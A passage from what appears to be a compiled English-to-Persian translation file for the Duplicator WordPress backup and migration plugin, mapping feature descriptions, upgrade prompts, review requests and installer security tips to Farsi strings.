Cloud Storage: Google Drive, Dropbox, Microsoft One Drive, Amazon S3 (or any compatible S3 service), and FTP/SFTP Storage.'=>'فضای ذخیره‌سازی ابری پشتیبانی‌شده: گوگل درایو، دراپ‌باکس، مایکروسافت وان درایو، آمازون S3 (یا هر سرویس سازگار با S3) و فضای ذخیره‌سازی FTP/SFTP.','Scheduled Backups provide peace of mind and ensure that critical data can be quickly and easily restored in the event of a disaster or loss. Duplicator Pro supports Hourly, Daily, Weekly and Monthly scheduled backups.'=>'پشتیبان‌گیری زمان‌بندی‌شده، آرامش خاطر را فراهم می‌کند و تضمین می‌کند که داده‌های حیاتی در صورت بروز فاجعه یا از دست رفتن، می‌توانند به سرعت و به راحتی بازیابی شوند. Duplicator Pro از پشتیبان‌گیری زمان‌بندی‌شده ساعتی، روزانه، هفتگی و ماهانه پشتیبانی می‌کند.','Recovery Points are not supported in Duplicator Lite!'=>'نقاط بازیابی در Duplicator Lite پشتیبانی نمی‌شوند!','Rollback your sites with Recovery Points!'=>'سایت‌های خود را با امتیازهای بازیابی به حالت اولیه برگردانید!','Overwrite a WordPress site with Drag and Drop Import!'=>'با کشیدن و رها کردن، یک سایت وردپرس را بازنویسی کنید!','In addition to the
classic installer method on an empty site, Duplicator Pro now supports Drag and Drop migrations and site restores! Simply drag the bundled site Backup to the site you wish to overwrite.'=>'علاوه بر روش نصب کلاسیک در یک سایت خالی، Duplicator Pro اکنون از انتقال و بازیابی سایت با کشیدن و رها کردن (Drag and Drop) پشتیبانی می‌کند! کافیست نسخه پشتیبان سایت همراه را به سایتی که می‌خواهید بازنویسی کنید، بکشید.','Upgrade Now'=>'همین حالا ارتقا دهید','Upgrade to PRO'=>'ارتقا به نسخه حرفه‌ای (PRO)','Duplicator Pro is the best WordPress migration & backup plugin I have ever used. I will be recommending this plugin to everyone I can.'=>'داپلیکیتور پرو بهترین افزونه مهاجرت و پشتیبان گیری وردپرس است که من تا به حال استفاده کرده ام. من این افزونه را به هر کسی که بتوانم توصیه می کنم.','It walked me step-by-step through the process of migrating a WordPress website. If you want to save a ton of time with WP migration, I very much recommend this plugin!'=>'این من را گام به گام در روند مهاجرت یک وب سایت وردپرس راهنمایی کرد. اگر می خواهید با مهاجرت WP در زمان زیادی صرفه جویی کنید، این افزونه را بسیار توصیه می کنم!','Testimonials'=>'نظرات مشتریان','Willie the Duplicator mascot'=>'نماد ویلیِ نسخه‌بردار','Upgrade to Duplicator Pro'=>'ارتقا به نسخه حرفه‌ای Duplicator','Create Your First Backup'=>'اولین نسخه پشتیبان خود را ایجاد کنید','See All Features'=>'مشاهده همه ویژگی‌ها','Duplicator Pro supports multisite network backup & migration. You can even install a subsite as a standalone site.'=>'داپلیکیتور پرو از پشتیبان گیری و مهاجرت شبکه چند سایتی پشتیبانی می کند. حتی می توانید یک سایت فرعی را به عنوان یک سایت مستقل نصب کنید.','Multisite Support'=>'پشتیبانی چند سایته','Duplicator Pro has developed a new way to package backups especially tailored for larger site. No server timeouts or other restrictions.'=>'Duplicator Pro روش جدیدی برای بسته‌بندی پشتیبان‌گیری‌ها، مخصوصاً متناسب با سایت‌های بزرگ‌تر، توسعه داده است. بدون وقفه سرور یا محدودیت‌های دیگر.','Use file and database filters to pick and choose exactly what you want to backup or transfer. No bloat!'=>'از فیلترهای فایل و پایگاه داده برای انتخاب دقیق آنچه می‌خواهید پشتیبان‌گیری یا انتقال دهید استفاده کنید. بدون هیچ گونه اتلاف وقت!','Direct Backup import from source server or cloud storage using URL. No need to download the Backup to your desktop machine first.'=>'وارد کردن مستقیم نسخه پشتیبان از سرور مبدا یا فضای ذخیره‌سازی ابری با استفاده از URL. نیازی نیست ابتدا نسخه پشتیبان را روی دستگاه دسکتاپ خود دانلود کنید.','Protect and secure the Backup file with industry-standard AES-256 encryption.'=>'فایل پشتیبان را با رمزگذاری استاندارد صنعتی AES-256 محافظت و ایمن کنید.','Recovery Points provides protection against mistakes and bad updates by letting you quickly rollback your system to a known, good state.'=>'نقاط بازیابی با فراهم کردن امکان بازگرداندن سریع سیستم به حالت خوب و شناخته‌شده، از شما در برابر اشتباهات و به‌روزرسانی‌های نامناسب محافظت می‌کنند.','Back up to Dropbox, FTP, Google Drive, OneDrive, or Amazon S3 and more for safe storage.'=>'برای ذخیره‌سازی امن، از فایل‌های خود در دراپ‌باکس، اف‌تی‌پی، گوگل درایو، وان‌درایو یا آمازون اس۳ و موارد دیگر نسخه پشتیبان تهیه کنید.','Cloud Backups'=>'پشتیبان‌گیری ابری','Ensure that important data is regularly and consistently backed up, allowing for quick and efficient recovery in case of data loss.'=>'اطمینان حاصل کنید که از داده‌های مهم به طور منظم و مداوم پشتیبان‌گیری می‌شود، که در صورت از دست رفتن داده‌ها، امکان بازیابی سریع و کارآمد را فراهم می‌کند.','Duplicator is both easy to use and extremely powerful. We have tons of helpful features that allow us to give you everything you need from a backup & migration plugin.'=>'افزونه‌ی Duplicator هم استفاده‌ی آسانی دارد و هم بسیار قدرتمند است. ما کلی ویژگی‌های مفید داریم که به شما امکان می‌دهد هر آنچه را که از یک افزونه‌ی پشتیبان‌گیری و انتقال نیاز دارید، در اختیارتان قرار دهیم.','Duplicator Features'=>'ویژگی‌های دستگاه تکثیر','Lite vs Pro'=>'لایت در مقابل پرو','Getting Started'=>'شروع به کار','Not Available'=>'موجود نیست','Included'=>'شامل','Pro'=>'حرفه‌ای','Lite'=>'کمی','Get the most out of Duplicator by upgrading to Pro and unlocking all of the powerful features.'=>'با ارتقا به نسخه حرفه‌ای و باز کردن قفل تمام ویژگی‌های قدرتمند، بیشترین بهره را از Duplicator ببرید.','Bonus: Duplicator Lite users get %1$d%% off regular price, automatically applied at checkout.'=>'امتیاز: کاربران داپلیکیتور لایت %1$d%% تخفیف از قیمت معمولی دریافت می‌کنند که به‌طور خودکار هنگام تسویه‌حساب اعمال می‌شود.','Get Duplicator Pro Today and Unlock all the Powerful Features'=>'همین امروز Duplicator Pro را دریافت کنید و تمام ویژگی‌های قدرتمند آن را آزاد کنید','We know that you will truly love Duplicator. It has over 4000+ five star ratings (%s) and is active on over 1 million websites.'=>'ما می دانیم که شما واقعاً داپلیکیتور را دوست خواهید داشت. بیش از 4000+ رتبه بندی پنج ستاره (%s) دارد و در بیش از 1 میلیون وب سایت فعال است.','Thanks for being a loyal Duplicator Lite user. Upgrade to Duplicator Pro to unlock all the awesome features and experience
why Duplicator is consistently rated the best WordPress migration plugin.'=>'از اینکه کاربر وفادار داپلیکیتور لایت هستید متشکریم. به داپلیکیتور پرو ارتقا دهید تا قفل تمام ویژگی‌ها و تجربه‌های فوق‌العاده را باز کنید
که چرا داپلیکیتور همواره به عنوان بهترین افزونه مهاجرت وردپرس رتبه‌بندی می‌شود.','Get Duplicator Pro and Unlock all the Powerful Features'=>'Duplicator Pro را دریافت کنید و تمام ویژگی‌های قدرتمند آن را آزاد کنید','How to Migrate to a New Site'=>'نحوه مهاجرت به سایت جدید','How to Create a Backup'=>'نحوه ایجاد نسخه پشتیبان','In the Backups page, the Backups list will be empty because there are no Backups yet. To create a new Backup, click on the Create New button, and this will launch the Backup Creation Wizard.'=>'در صفحه پشتیبان‌گیری، لیست پشتیبان‌گیری‌ها خالی خواهد بود زیرا هنوز هیچ پشتیبان‌گیری وجود ندارد. برای ایجاد یک پشتیبان جدید، روی دکمه «ایجاد جدید» کلیک کنید و این کار جادوگر ایجاد پشتیبان‌گیری را اجرا می‌کند.','To begin, you’ll need to be logged into the WordPress admin area. Once there, click on Duplicator in the admin sidebar to go the Backups page.'=>'برای شروع، باید وارد بخش مدیریت وردپرس شوید. پس از ورود، روی Duplicator در نوار کناری مدیریت کلیک کنید تا به صفحه پشتیبان‌گیری بروید.','Want to get started creating your first Backup with Duplicator? By following the step by step instructions in this walkthrough, you can easily create a backup or migration.'=>'آیا می‌خواهید اولین نسخه پشتیبان خود را با Duplicator ایجاد کنید؟ با دنبال کردن دستورالعمل‌های گام به گام در این راهنما، می‌توانید به راحتی یک نسخه پشتیبان یا مهاجرت ایجاد کنید.','Creating Your First Backup'=>'ایجاد اولین نسخه پشتیبان','The Awesome Motive Team'=>'تیم انگیزه فوق‌العاده','The Awesome Motive Team photo'=>'عکس تیم انگیزه فوق‌العاده','Yup, we know a thing or two about building awesome products that customers love.'=>'بله، ما یک یا دو نکته در مورد ساخت محصولات فوق‌العاده‌ای که مشتریان دوست دارند می‌دانیم.','Duplicator is brought to you by the same team that’s behind the largest WordPress resource site, WPBeginner, the most popular lead-generation software, OptinMonster, the best WordPress analytics plugin, MonsterInsights, and more!'=>'داپلیکیتور توسط همان تیمی که پشت بزرگترین سایت منبع وردپرس است، WPBeginner، محبوب‌ترین سرنخ، برای شما آورده شده است. نرم افزار تولید، OptinMonster، بهترین افزونه تجزیه و تحلیل وردپرس، MonsterInsights و موارد دیگر!','Our goal is to take the pain out of creating backups, migrations, and make it easy.'=>'هدف ما این است که دردسرهای ایجاد پشتیبان‌گیری و مهاجرت را از بین ببریم و این کار را آسان کنیم.','Over the years, we found that most WordPress backup and migration plugins were unreliable, buggy, slow, and very hard to use. So we started with a simple goal: build a WordPress backup and migration plugin that’s both easy and powerful.'=>'در طول این سال‌ها، متوجه شدیم که اکثر افزونه‌های پشتیبان‌گیری و انتقال وردپرس غیرقابل اعتماد، دارای باگ، کند و استفاده از آنها بسیار دشوار است. بنابراین ما با یک هدف ساده شروع کردیم: ساخت یک افزونه پشتیبان‌گیری و انتقال وردپرس که هم آسان و هم قدرتمند باشد.','Hello and welcome to Duplicator, the most reliable WordPress backup and migration plugin. At Duplicator, we build software that helps protect your website with our reliable secure backups and migrate your website without any manual effort.'=>'سلام و به Duplicator، قابل اعتمادترین افزونه پشتیبان گیری و انتقال وردپرس، خوش آمدید. در Duplicator، ما نرم افزاری می سازیم که به محافظت از وب سایت شما با پشتیبان گیری های مطمئن و ایمن ما کمک می کند و وب سایت شما را بدون هیچ گونه تلاش دستی منتقل می کند.','Status:'=>'وضعیت:','Install Plugin'=>'نصب افزونه','Activate'=>'فعال کردن','Activated'=>'فعال شده','Multisite Support - Duplicator Pro supports multisite network backup & migration. You can even install a subsite as a standalone site.'=>'پشتیبانی از چند سایت - افزونه Duplicator Pro از پشتیبان‌گیری و انتقال شبکه چند سایتی پشتیبانی می‌کند. شما حتی می‌توانید یک زیرسایت را به عنوان یک سایت مستقل نصب کنید.','Large Site Support - Duplicator Pro has developed a new way to package backups especially tailored for larger site. No server timeouts or other restrictions.'=>'پشتیبانی از سایت‌های بزرگ - Duplicator Pro روش جدیدی برای بسته‌بندی پشتیبان‌گیری‌ها، مخصوصاً متناسب با سایت‌های بزرگ‌تر، توسعه داده است. بدون وقفه سرور یا محدودیت‌های دیگر.','File & Database Table Filters - Use file and database filters to pick and choose exactly what you want to backup or transfer. No bloat!'=>'فیلترهای جدول فایل و پایگاه داده - از فیلترهای فایل و پایگاه داده برای انتخاب دقیق آنچه می‌خواهید پشتیبان‌گیری یا انتقال دهید استفاده کنید. بدون هیچ گونه اتلاف وقت!','Server to Server Import - Direct Backup import from source server or cloud storage using URL. No need to download the Backup to your desktop machine first.'=>'وارد کردن سرور به سرور - وارد کردن مستقیم نسخه پشتیبان از سرور مبدا یا فضای ذخیره‌سازی ابری با استفاده از URL. نیازی نیست ابتدا نسخه پشتیبان را روی دستگاه دسکتاپ خود دانلود کنید.','Secure File Encryption - Protect and secure the archive file with industry-standard AES-256 encryption'=>'رمزگذاری امن فایل - محافظت و ایمن‌سازی فایل بایگانی با رمزگذاری استاندارد صنعتی AES-256','Recovery Points - Recovery Points provides protection against mistakes and bad updates by letting you quickly rollback your system to a known, good state.'=>'نقاط بازیابی - نقاط بازیابی با فراهم کردن امکان بازگرداندن سریع سیستم به یک وضعیت خوب و شناخته‌شده، از سیستم در برابر اشتباهات و به‌روزرسانی‌های نامناسب محافظت می‌کنند.','Cloud Backups - Back up to Dropbox, FTP, Google Drive, OneDrive, or Amazon S3 and more for safe storage.'=>'پشتیبان‌گیری ابری - برای ذخیره‌سازی امن، از اطلاعات خود در دراپ‌باکس، FTP، گوگل درایو، وان‌درایو یا آمازون S3 و موارد دیگر پشتیبان‌گیری کنید.','Scheduled Backups - Ensure that important data is regularly and consistently backed up, allowing for quick and efficient recovery in case of data loss.'=>'پشتیبان‌گیری زمان‌بندی‌شده - اطمینان حاصل کنید که از داده‌های مهم به‌طور منظم و مداوم پشتیبان‌گیری می‌شود و در صورت از دست رفتن داده‌ها، امکان بازیابی سریع و کارآمد فراهم می‌شود.','%s represents the time diff, eg. 2 days%s ago'=>'%s پیش','No Backups have been created yet.'=>'هنوز هیچ نسخه پشتیبان ایجاد نشده است.','A Backup is currently running.'=>'در حال حاضر یک نسخه پشتیبان در حال اجرا است.','Sugar Calendar Pro'=>'تقویم شکری حرفه‌ای','A simple & powerful event calendar plugin for WordPress that comes with all the event management features including payments, scheduling, timezones, ticketing, recurring events, and more.'=>'یک افزونه تقویم رویداد ساده و قدرتمند برای وردپرس که با تمام ویژگی‌های مدیریت رویداد از جمله پرداخت‌ها، برنامه‌ریزی، مناطق زمانی، فروش بلیط، رویدادهای تکراری و موارد دیگر ارائه می‌شود.','Sugar Calendar'=>'تقویم شکر','The best WordPress eCommerce plugin for selling digital downloads. Start selling eBooks, software, music, digital art, and more within minutes. Accept payments, manage subscriptions, advanced access control, and more.'=>'بهترین افزونه تجارت الکترونیک وردپرس برای فروش محصولات دیجیتال. فروش کتاب‌های الکترونیکی، نرم‌افزار، موسیقی، هنر دیجیتال و موارد دیگر را در عرض چند دقیقه شروع کنید. پرداخت‌ها را بپذیرید، اشتراک‌ها را مدیریت کنید، کنترل دسترسی پیشرفته و موارد دیگر.','Easy Digital Downloads'=>'دانلود آسان دیجیتال','WP Simple Pay Pro'=>'افزونه پرداخت ساده وردپرس (WP Simple Pay Pro)','The #1 Stripe payments plugin for WordPress. Start accepting one-time and recurring payments on your WordPress site without setting up a shopping cart. No code required.'=>'پلاگین #1 پرداخت Stripe برای وردپرس. بدون راه اندازی سبد خرید، پرداخت های یک بار و مکرر را در سایت وردپرس خود بپذیرید. بدون نیاز به کد.','WP Simple Pay'=>'پرداخت ساده وردپرس','The #1 affiliate management plugin for WordPress. Easily create an affiliate program for your eCommerce store or membership site within minutes and start growing your sales with the power of referral marketing.'=>'افزونه شماره 1 مدیریت وابسته برای وردپرس. به راحتی در عرض چند دقیقه یک برنامه وابسته برای فروشگاه تجارت الکترونیک یا سایت عضویت خود ایجاد کنید و با قدرت بازاریابی ارجاعی شروع به رشد فروش خود کنید.','AffiliateWP'=>'وابسته WP','The most advanced WordPress search plugin. Customize your WordPress search algorithm, reorder search results, track search metrics, and everything you need to leverage search to grow your business.'=>'پیشرفته‌ترین افزونه جستجوی وردپرس. الگوریتم جستجوی وردپرس خود را سفارشی کنید، نتایج جستجو را دوباره مرتب کنید، معیارهای جستجو را پیگیری کنید و هر آنچه را که برای بهره‌گیری از جستجو برای رشد کسب و کار خود نیاز دارید، در اختیار داشته باشید.','SearchWP'=>'جستجوی وردپرس','Boost your sales and conversions by up to 15% with real-time social proof notifications. TrustPulse helps you show live user activity and purchases to help convince other users to purchase.'=>'با اعلان‌های اثبات اجتماعی در لحظه، فروش و تبدیل‌های خود را تا ۱۵٪ افزایش دهید. TrustPulse به شما کمک می‌کند تا فعالیت و خریدهای کاربران را به صورت زنده نمایش دهید تا سایر کاربران را به خرید متقاعد کنید.','TrustPulse'=>'تراست‌پالس','Smash Balloon YouTube Feeds Pro'=>'فیدهای یوتیوب Smash Balloon Pro','Easily display YouTube videos on your WordPress site without writing any code. Comes with multiple layouts, ability to embed live streams, video filtering, ability to combine multiple channel videos, and more.'=>'به راحتی ویدیوهای یوتیوب را در سایت وردپرس خود بدون نوشتن هیچ کدی نمایش دهید. دارای چندین طرح‌بندی، قابلیت جاسازی پخش زنده، فیلتر ویدیو، قابلیت ترکیب ویدیوهای چند کاناله و موارد دیگر است.','Smash Balloon YouTube Feeds'=>'فیدهای یوتیوب اسمش بالون','Smash Balloon Twitter Feeds Pro'=>'فید توییتر Smash Balloon Pro','Easily display Twitter content in WordPress without writing any code. Comes with multiple layouts, ability to combine multiple Twitter feeds, Twitter card support, tweet moderation, and more.'=>'به راحتی محتوای توییتر را در وردپرس بدون نوشتن هیچ کدی نمایش دهید. دارای چندین طرح‌بندی، قابلیت ترکیب چندین فید توییتر، پشتیبانی از کارت توییتر، مدیریت توییت و موارد دیگر است.','Smash Balloon Twitter Feeds'=>'فیدهای توییتر Smash Balloon','Smash Balloon Facebook Feeds Pro'=>'فیدهای فیسبوک اسمش بالون پرو','Easily display Facebook content on your WordPress site without writing any code. Comes with multiple templates, ability to embed albums, group content, reviews, live videos, comments, and reactions.'=>'به راحتی محتوای فیسبوک را در سایت وردپرس خود بدون نوشتن هیچ کدی نمایش دهید. دارای قالب‌های متعدد، قابلیت جاسازی آلبوم‌ها، محتوای گروهی، نقد و بررسی‌ها، ویدیوهای زنده، نظرات و واکنش‌ها.','Smash Balloon Facebook Feeds'=>'فیدهای فیسبوک اسمش بالون','Smash Balloon Instagram Feeds Pro'=>'فیدهای اینستاگرام Smash Balloon Pro','Easily display Instagram content on your WordPress site without writing any code. Comes with multiple templates, ability to show content from multiple accounts, hashtags, and more. Trusted by 1 million websites.'=>'به راحتی محتوای اینستاگرام را در سایت وردپرس خود بدون نوشتن هیچ کدی نمایش دهید. دارای قالب‌های متعدد، قابلیت نمایش محتوا از چندین حساب کاربری، هشتگ‌ها و موارد دیگر. مورد اعتماد ۱ میلیون وب‌سایت.','Smash Balloon Instagram Feeds'=>'فیدهای اینستاگرام Smash Balloon','Connect with your visitors after they leave your website with the leading web push notification software. Over 10,000+ businesses worldwide use PushEngage to send 9 billion notifications each month.'=>'با استفاده از نرم‌افزار پیشرو ارسال اعلان‌های وب، پس از ترک وب‌سایتتان، با بازدیدکنندگان خود ارتباط برقرار کنید. بیش از ۱۰،۰۰۰+ کسب‌وکار در سراسر جهان از PushEngage برای ارسال ۹ میلیارد اعلان در هر ماه استفاده می‌کنند.','PushEngage'=>'پوش انگیج','RafflePress Pro'=>'رافل‌پرس پرو','Turn your website visitors into brand ambassadors! Easily grow your email list, website traffic, and social media followers with the most powerful giveaways & contests plugin for WordPress.'=>'بازدیدکنندگان وب‌سایت خود را به سفیران برند تبدیل کنید! به راحتی لیست ایمیل، ترافیک وب‌سایت و دنبال‌کنندگان رسانه‌های اجتماعی خود را با قدرتمندترین افزونه‌ی اهدای جوایز و مسابقات برای وردپرس افزایش دهید.','RafflePress'=>'رافل پرس','SeedProd Pro'=>'سیدپرود پرو','The best WordPress coming soon page plugin to create a beautiful coming soon page, maintenance mode page, or landing page. No coding skills required.'=>'بهترین افزونه صفحه «به زودی» وردپرس برای ایجاد یک صفحه «به زودی»، صفحه حالت تعمیر یا صفحه فرود زیبا. بدون نیاز به مهارت کدنویسی.','SeedProd'=>'سیدپرود','AIOSEO Pro'=>'آیوسئو پرو','The original WordPress SEO plugin and toolkit that improves your website\'s search rankings. Comes with all the SEO features like Local SEO, WooCommerce SEO, sitemaps, SEO optimizer, schema, and more.'=>'افزونه و ابزار اصلی سئو وردپرس که رتبه‌بندی جستجوی وب‌سایت شما را بهبود می‌بخشد. این افزونه با تمام ویژگی‌های سئو مانند سئو محلی، سئو ووکامرس، نقشه سایت، بهینه‌ساز سئو، طرحواره و موارد دیگر ارائه می‌شود.','AIOSEO'=>'سن','WP Mail SMTP Pro'=>'افزونه WP Mail SMTP Pro','Improve your WordPress email deliverability and make sure that your website emails reach user\'s inbox with the #1 SMTP plugin for WordPress. Over 3 million websites use it to fix WordPress email issues.'=>'با افزونه شماره 1 SMTP برای وردپرس، قابلیت تحویل ایمیل وردپرس خود را بهبود دهید و مطمئن شوید که ایمیل های وب سایت شما به صندوق ورودی کاربر می رسد. بیش از 3 میلیون وب سایت از آن برای رفع مشکلات ایمیل وردپرس استفاده می کنند.','WP Mail SMTP'=>'WP Mail SMTP','The easiest drag & drop WordPress form builder plugin to create beautiful contact forms, subscription forms, payment forms, and more in minutes. No coding skills required.'=>'ساده‌ترین افزونه فرم‌ساز وردپرس با قابلیت کشیدن و رها کردن برای ایجاد فرم‌های تماس زیبا، فرم‌های اشتراک، فرم‌های پرداخت و موارد دیگر در عرض چند دقیقه. بدون نیاز به مهارت کدنویسی.','WPForms Pro'=>'WPForms Pro','The best drag & drop WordPress form builder. Easily create beautiful contact forms, surveys, payment forms, and more with our 100+ form templates. Trusted by over 4 million websites as the best forms plugin.'=>'بهترین سازنده فرم وردپرس با قابلیت کشیدن و رها کردن. به راحتی فرم‌های تماس زیبا، نظرسنجی، فرم‌های پرداخت و موارد دیگر را با بیش از ۱۰۰ قالب فرم ما ایجاد کنید. مورد اعتماد بیش از ۴ میلیون وب‌سایت به عنوان بهترین افزونه فرم.','WPForms'=>'فرم‌های WP','MonsterInsights Pro'=>'MonsterInsights Pro','The leading WordPress analytics plugin that shows you how people find and use your website, so you can make data driven decisions to grow your business. Properly set up Google Analytics without writing code.'=>'افزونه پیشرو در زمینه تجزیه و تحلیل وردپرس که به شما نشان می‌دهد افراد چگونه وب‌سایت شما را پیدا کرده و از آن استفاده می‌کنند، بنابراین می‌توانید تصمیمات مبتنی بر داده برای رشد کسب و کار خود بگیرید. گوگل آنالیتیکس را به درستی و بدون نوشتن کد راه‌اندازی کنید.','MonsterInsights'=>'مانستر اینسایتس','Instantly get more subscribers, leads, and sales with the #1 conversion optimization toolkit. Create high converting popups, announcement bars, spin a wheel, and more with smart targeting and personalization.'=>'با جعبه ابزار بهینه‌سازی تبدیل شماره 1، مشترکین، سرنخ‌ها و فروش بیشتری دریافت کنید. با هدف‌گیری و شخصی‌سازی هوشمند، پنجره‌های بازشو، نوارهای اعلامیه، چرخاندن یک چرخ و موارد دیگر را ایجاد کنید.','Plugin not found'=>'افزونه پیدا نشد','Plugin slug is empty'=>'نامک افزونه خالی است','Not Installed'=>'نصب نشده','Inactive'=>'غیرفعال','Active'=>'فعال','Multisite Network'=>'شبکه چند سایتی','Regenerate SALTS'=>'نمک‌ها را احیا کنید','Developer Hooks'=>'قلاب‌های توسعه‌دهنده','Smart Migration Wizard'=>'ویزارد مهاجرت هوشمند','Multisite Network Support'=>'پشتیبانی از شبکه چند سایته','Cloud Storage - FTP/SFTP'=>'فضای ذخیره‌سازی ابری - FTP/SFTP','Cloud Storage - OneDrive'=>'فضای ذخیره‌سازی ابری - وان‌درایو','Cloud Storage - DropBox'=>'فضای ذخیره‌سازی ابری - دراپ‌باکس','Cloud Storage - Amazon S3'=>'فضای ذخیره‌سازی ابری - آمازون S3','Cloud Storage - Google Drive'=>'فضای ذخیره‌سازی ابری - گوگل درایو','Server to Server Import'=>'واردات سرور به سرور','Secure File Encryption'=>'رمزگذاری امن فایل','About Us'=>'درباره ما','About Duplicator'=>'درباره تکثیرکننده','NEW!'=>'جدید!','Welcome to Duplicator'=>'به تکثیرکننده خوش آمدید','FTP/SFTP'=>'اف‌تی‌پی/اس‌اف‌تی‌پی','S3-Compatible Provider'=>'ارائه دهنده سازگار با S3','Priority Support'=>'پشتیبانی اولویت‌دار','Limited Support'=>'پشتیبانی محدود','Advanced features included: Hourly Schedules, Custom Search & Replace, Migrate Duplicator Settings, Regenerate Salts and Developer Hooks'=>'ویژگی‌های پیشرفته شامل: برنامه‌های ساعتی، جستجو و جایگزینی سفارشی، انتقال تنظیمات نسخه‌برداری، بازسازی Saltها و قلاب‌های توسعه‌دهنده','Advanced Features'=>'ویژگی‌های پیشرفته','Enhanced features include: Managed Hosting Support, Shared Database Support, Streamlined Installer, Email Alerts and more...'=>'ویژگی‌های پیشرفته شامل موارد زیر است: پشتیبانی از هاستینگ مدیریت‌شده، پشتیبانی از پایگاه داده مشترک، نصب‌کننده ساده، هشدارهای ایمیلی و موارد دیگر...','Enhanced Features'=>'ویژگی‌های پیشرفته','Protect and secure the archive file with industry-standard AES-256 encryption!'=>'فایل آرشیو را با رمزگذاری استاندارد صنعتی AES-256 محافظت و ایمن کنید!','Archive Encryption'=>'رمزگذاری بایگانی','Create your own custom-configured WordPress site and "Brand" the installer file with your look and feel.'=>'سایت وردپرس سفارشی خودتان را بسازید و فایل نصب را با ظاهر و حس و حال خودتان «برندسازی» کنید.','Supports multisite network backup & migration. Subsite As Standalone Install, Standalone Import Into Multisite and Import Subsite Into Multisite'=>'پشتیبانی از پشتیبان‌گیری و مهاجرت شبکه چندسایتی. نصب مستقل زیرسایت، وارد کردن مستقل به چندسایت و وارد کردن زیرسایت به چندسایت','Multisite support'=>'پشتیبانی چند سایتی','Direct Server Transfers allow you to build an archive, then directly transfer it from the source server to the destination server for a lightning fast migration!'=>'انتقال مستقیم سرور به شما امکان می‌دهد یک آرشیو بسازید، سپس آن را مستقیماً از سرور مبدا به سرور مقصد منتقل کنید تا مهاجرتی سریع و برق‌آسا داشته باشید!','Server-to-Server Import'=>'درون ریزی سرور به سرور','We\'ve developed a new way to package backups especially tailored for larger site. No server timeouts or other restrictions!'=>'ما روش جدیدی برای بسته‌بندی پشتیبان‌گیری‌ها، مخصوصاً متناسب با سایت‌های بزرگ‌تر، توسعه داده‌ایم. بدون وقفه سرور یا محدودیت‌های دیگر!','Larger Site Support'=>'پشتیبانی سایت‌های بزرگتر','Back up to Dropbox, FTP, Google Drive, OneDrive, Amazon S3 or any S3-compatible storage service for safe storage.'=>'برای ذخیره‌سازی ایمن، از فایل‌های خود در دراپ‌باکس، FTP، گوگل درایو، وان‌درایو، آمازون S3 یا هر سرویس ذخیره‌سازی سازگار با S3 پشتیبان تهیه کنید.','Recovery Points provide protection against mistakes and bad updates by letting you quickly rollback your system to a known, good state.'=>'نقاط بازیابی با فراهم کردن امکان بازگرداندن سریع سیستم به حالت خوب و شناخته‌شده، از شما در برابر اشتباهات و به‌روزرسانی‌های نامناسب محافظت می‌کنند.','Ensure that your important data is regularly and consistently backed up, allowing for quick and efficient recovery in case of data loss.'=>'اطمینان حاصل کنید که از داده‌های مهم شما به طور منظم و مداوم نسخه پشتیبان تهیه می‌شود، که در صورت از دست دادن داده‌ها، امکان بازیابی سریع و کارآمد را فراهم می‌کند.','Drag and Drop migrations and site restores! Simply drag the bundled site archive to the site you wish to overwrite.'=>'انتقال و بازیابی سایت با کشیدن و رها کردن! کافیست آرشیو سایت همراه را به سایتی که می‌خواهید اطلاعات آن را بازنویسی کنید، بکشید.','Classic WordPress-less Installs Only'=>'فقط نصب‌های کلاسیک بدون وردپرس','Dismiss this message.'=>'این پیام را رد کنید.','You\'re using Duplicator Lite. To unlock more features consider upgrading to Pro'=>'شما از داپلیکیتور رایگان استفاده می‌کنید. برای باز کردن قفل ویژگی‌های بیشتر، ارتقا به پرو را در نظر بگیرید','Please rate Duplicator ★★★★★ on WordPress.org to help us spread the word. Thank you from the Duplicator team!'=>'لطفاً داپلیکیتور ★★★★★★★ 9733; در WordPress.org برای کمک به ما در انتشار این خبر. از تیم داپلیکیتور متشکرم!','No thanks'=>'نه ممنون','Give Feedback'=>'بازخورد بدهید','We\'re sorry to hear you aren\'t enjoying Duplicator. We would love a chance to improve. Could you take a minute and let us know what we can do better?'=>'از اینکه از Duplicator لذت نمی‌برید متاسفیم. ما دوست داریم فرصتی برای بهبود آن داشته باشیم. می‌توانید یک دقیقه وقت بگذارید و به ما بگویید که چه کاری می‌توانیم بهتر انجام دهیم؟','I already did'=>'من قبلاً انجام دادم','Nope, maybe later'=>'نه، شاید بعداً','Ok, you deserve it'=>'باشه، لیاقتشو داری','~ John Turner
President of Duplicator'=>'~ جان ترنر
رئیس شرکت داپلیکیتور','That’s awesome! Could you please do me a BIG favor and give it a 5-star rating on WordPress to help us spread the word and boost our motivation?'=>'عالیه! میشه لطفا یه لطف بزرگ در حقم بکنید و تو وردپرس به این مطلب یه امتیاز ۵ ستاره بدید تا بیشتر پخشش کنیم و انگیزه‌مون بیشتر بشه؟','Not really'=>'نه واقعاً','Are you enjoying %s?'=>'از %s لذت می‌بری؟','Upgrade to Pro'=>'ارتقا به نسخه حرفه‌ای','Password Protection Disabled'=>'محافظت از رمز عبور غیرفعال است','Password Protection Enabled'=>'محافظت با رمز عبور فعال شد','Tip: Each row on the Backups screen includes a copy button to copy the installer name to the clipboard. Paste the installer name from the clipboard into the URL being used to install the destination site. This feature is handy when using the secure installer name.'=>'نکته: هر ردیف در صفحه پشتیبان‌گیری شامل یک دکمه کپی برای کپی کردن نام نصب کننده در کلیپ بورد است. نام نصب کننده را از کلیپ بورد در پیوند مورد استفاده برای نصب سایت مقصد قرار دهید. این ویژگی هنگام استفاده از نام نصب کننده ایمن مفید است.','Do not to leave any installer files on the destination server, after installing the migrated/restored site. Logon as a WordPress administrator and follow the prompts to remove the installer files or remove them manually.'=>'پس از نصب سایت منتقل شده/بازیابی شده، هیچ فایل نصبی را روی سرور مقصد باقی نگذارید. به عنوان یک مدیر وردپرس وارد شوید و دستورات را دنبال کنید تا فایل های نصب کننده را حذف کنید یا آنها را به صورت دستی حذف کنید.','This setting specifies the name of the installer used at download-time. Independent of the value of this setting, you can change the name of the installer in the "Save as" file dialog at download-time. If you choose to use a custom name, use a file name that is known only to you. Installer filenames must end in "php". Changes to the Backup file should not be made.'=>'این تنظیم نام نصب کننده مورد استفاده در زمان دانلود را مشخص می کند. مستقل از مقدار این تنظیم، می توانید نام نصب کننده را در گفتگوی فایل "ذخیره به عنوان" در زمان دانلود تغییر دهید. اگر می خواهید از یک نام سفارشی استفاده کنید، از نام فایلی استفاده کنید که فقط برای شما شناخته شده است. نام فایل های نصب کننده باید به "php" ختم شود. تغییر در فایل پشتیبان نباید ایجاد شود.','Example'=>'مثال','Using a \'Secure\' file helps prevent unauthorized access to the installer 